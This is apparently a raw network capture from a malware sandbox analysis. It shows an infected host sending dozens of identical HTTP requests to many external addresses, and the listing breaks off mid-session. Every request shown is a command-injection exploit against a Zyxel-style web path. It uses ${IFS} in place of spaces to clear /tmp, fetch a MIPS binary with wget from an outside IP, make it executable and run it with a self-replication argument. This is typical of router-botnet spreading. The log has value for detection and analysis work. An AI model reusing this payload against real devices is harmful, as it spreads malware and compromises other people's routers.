                                                      Feb 2, 2024 06:35:40.359941006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1396192.168.2.1446166216.126.250.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.359972000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1397192.168.2.1440340156.133.151.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360014915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1398192.168.2.1456120208.67.70.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360065937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1399192.168.2.144316217.21.69.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360106945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1400192.168.2.144248057.242.254.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360146999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1401192.168.2.1445656197.132.24.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360187054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1402192.168.2.144878498.17.160.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360210896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1403192.168.2.1458426109.237.197.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360255957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1404192.168.2.144055841.68.74.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360307932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1405192.168.2.1453876194.168.162.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360354900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1406192.168.2.145957480.107.148.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360375881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1407192.168.2.144757025.190.212.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360420942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1408192.168.2.145824861.185.181.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360451937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1409192.168.2.1455606175.151.23.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360493898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1410192.168.2.1455010182.86.109.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360549927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1411192.168.2.14600565.38.158.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360596895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1412192.168.2.143621463.60.221.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360655069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1413192.168.2.1459502173.196.50.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360699892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1414192.168.2.1456006104.192.200.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360734940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1415192.168.2.1454310124.248.172.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360769033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1416192.168.2.145680487.191.70.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360810041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1417192.168.2.1439288222.226.139.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360835075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1418192.168.2.143789279.9.189.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360908985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1419192.168.2.143784246.160.109.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360929012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1420192.168.2.143783235.202.214.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.360958099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1421192.168.2.144648244.180.61.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.361020088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1422192.168.2.1442634169.79.64.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.361053944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1423192.168.2.1440454133.109.131.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.361078978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1424192.168.2.143365631.34.168.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.361110926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1425192.168.2.1435730217.244.115.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374022961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1426192.168.2.144145224.196.2.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374043941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1427192.168.2.144049495.91.70.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374099016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1428192.168.2.1450824162.151.194.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374146938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1429192.168.2.1444084213.118.114.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374176979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1430192.168.2.1434472222.27.54.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374222994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1431192.168.2.1450060101.190.159.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374284029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1432192.168.2.1452226168.125.240.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374413013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1433192.168.2.143785264.71.189.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374453068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1434192.168.2.143390424.134.123.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374473095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1435192.168.2.143918036.157.194.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374505997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1436192.168.2.1443400201.25.234.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374567032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1437192.168.2.145242694.59.188.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374594927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1438192.168.2.144685092.149.5.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374655962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1439192.168.2.144367043.106.174.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374696970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1440192.168.2.144684219.57.32.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374802113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1441192.168.2.1452896133.52.57.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374814987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1442192.168.2.143679039.62.0.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374828100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1443192.168.2.143565073.176.186.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374888897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1444192.168.2.145319665.186.104.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374941111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1445192.168.2.1454836115.166.173.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.374984026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1446192.168.2.1454108166.61.74.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375036955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1447192.168.2.1440984183.55.179.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375041962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1448192.168.2.14385761.184.125.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375113964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1449192.168.2.1455910167.188.192.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375158072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1450192.168.2.145397279.80.148.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375205994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1451192.168.2.145883035.218.249.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375247955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1452192.168.2.145047657.31.211.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375261068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1453192.168.2.1450538206.212.226.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375262022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1454192.168.2.144546447.163.9.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375328064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1455192.168.2.1458634136.65.72.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375364065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1456192.168.2.1449356174.251.46.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375426054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1457192.168.2.145912253.210.201.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.375437021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1458192.168.2.143911692.177.171.177443
                                                      TimestampBytes transferredDirectionData
